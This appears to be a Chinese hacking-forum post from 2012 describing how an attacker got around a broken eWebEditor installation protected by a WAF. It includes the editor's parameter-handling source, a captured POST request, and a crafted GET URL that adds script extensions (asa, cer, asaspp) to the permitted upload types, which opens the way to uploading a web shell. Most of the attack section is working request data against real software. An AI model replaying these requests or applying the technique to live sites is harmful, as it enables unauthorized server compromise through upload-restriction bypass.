|
|
题目说到了问题和突破,问题的ewebeditor程序,这儿程序问题出来哪儿呢?
1.登陆的地方被删除了,也就是admin_login.asp这个页面被删除了。
2.是post提交好像有问题,不管点击那个提交post都会跳转到登陆页面,但是登陆页面又没有,如果直接访问那个页面,当然也可以访问。
当然上边说到的突破,所谓突破也就是说非常规的环境,非常规的手法去实现同一个目的。下面说一下这个非常规的环境。
1.问题ewebeditor
2.服务器装有安全狗
下面是我测试的过程:
首先当然是增加样式,但是常规的post提交失败,于是我想到了想这样的在老程序他一般都是使用request接受数据的,于是乎我下载了源码看了下,如果如此:- ' 检测样式表单提交的有效性
- sStyleName = Trim(Request("d_name"))
- sStyleDir = Trim(Request("d_dir"))
- sStyleCSS = Trim(Request("d_css"))
- sStyleUploadDir = Trim(Request("d_uploaddir"))
- sStyleBaseHref = Trim(Request("d_basehref"))
- sStyleContentPath = Trim(Request("d_contentpath"))
- sStyleWidth = Trim(Request("d_width"))
- sStyleHeight = Trim(Request("d_height"))
- sStyleMemo = Request("d_memo")
- sStyleImageExt = Request("d_imageext")
- sStyleFlashExt = Request("d_flashext")
- sStyleMediaExt = Request("d_mediaext")
- sStyleRemoteExt = Request("d_remoteext")
- sStyleFileExt = Request("d_fileext")
- sStyleImageSize = Request("d_imagesize")
- sStyleFlashSize = Request("d_flashsize")
- sStyleMediaSize = Request("d_mediasize")
- sStyleRemoteSize = Request("d_remotesize")
- sStyleFileSize = Request("d_filesize")
- sStyleStateFlag = Request("d_stateflag")
- sStyleAutoRemote = Request("d_autoremote")
- sStyleShowBorder = Request("d_showborder")
- sStyleUploadObject = Request("d_uploadobject")
- sStyleAutoDir = Request("d_autodir")
- sStyleDetectFromWord = Request("d_detectfromword")
- sStyleInitMode = Request("d_initmode")
- sStyleBaseUrl = Request("d_baseurl")
当然此处post失效了,所以我抓了下包,得到如下数据
- [url=http://xxxx.com/system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50]http://xxxx.com/system/eWebEdito ... =StyleSetSave&id=50[/url]
- POST /system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50 HTTP/1.1
- Host: xxxx.com
- User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Connection: keep-alive
- Referer: [url=http://xxxx.com/system/eWebEditor/admin_style.asp?action=styleset&id=50]http://xxxx.com/system/eWebEdito ... tion=styleset&id=50[/url]
- Cookie: ASPSESSIONIDSABCQBBT=KHLJMNEAEKNNMGAMJAFHCPOK
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 740
- d_name=standard1&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=550&d_height=350&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=UploadFile%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7C%3Basa.ass%3B.jpg&d_imagesize=500&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cjpeg%7Cbmp&d_remotesize=100&d_memo=Office%B1%EA%D7%BC%B7%E7%B8%F1%A3%AC%B2%BF%B7%D6%B3%A3%D3%C3%B0%B4%C5%A5%A3%AC%B1%EA%D7%BC%CA%CA%BA%CF%BD%E7%C3%E6%BF%ED%B6%C8%A3%AC%C4%AC%C8%CF%D1%F9%CA%BD&x=42&y=11
- [url=http://xxxx.com/system/eWebEditor/admin_style.asp?action=StyleSetSave&id=50&d_name=standard1&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=550&d_height=350&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7Casaspp%7Ccer%7cASA&d_imagesize=500&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cjpeg%7Cbmp&d_remotesize=100&d_memo=Office%B1%EA%D7%BC%B7%E7%B8%F1%A3%AC%B2%BF%B7%D6%B3%A3%D3%C3%B0%B4%C5%A5%A3%AC%B1%EA%D7%BC%CA%CA%BA%CF%BD%E7%C3%E6%BF%ED%B6%C8%A3%AC%C4%AC%C8%CF%D1%F9%CA%BD&x=42&y=11]http://xxxx.com/system/eWebEdito ... %F9%CA%BD&x=42&y=11[/url]
http://xxxx.com/system/eWebEdito ... tion=styleset&id=50
|
评分
-
查看全部评分
|
发表于 2012-9-1 00:43:23
发表于 2012-9-1 01:18:26
发表于 2012-9-1 01:20:42
看看~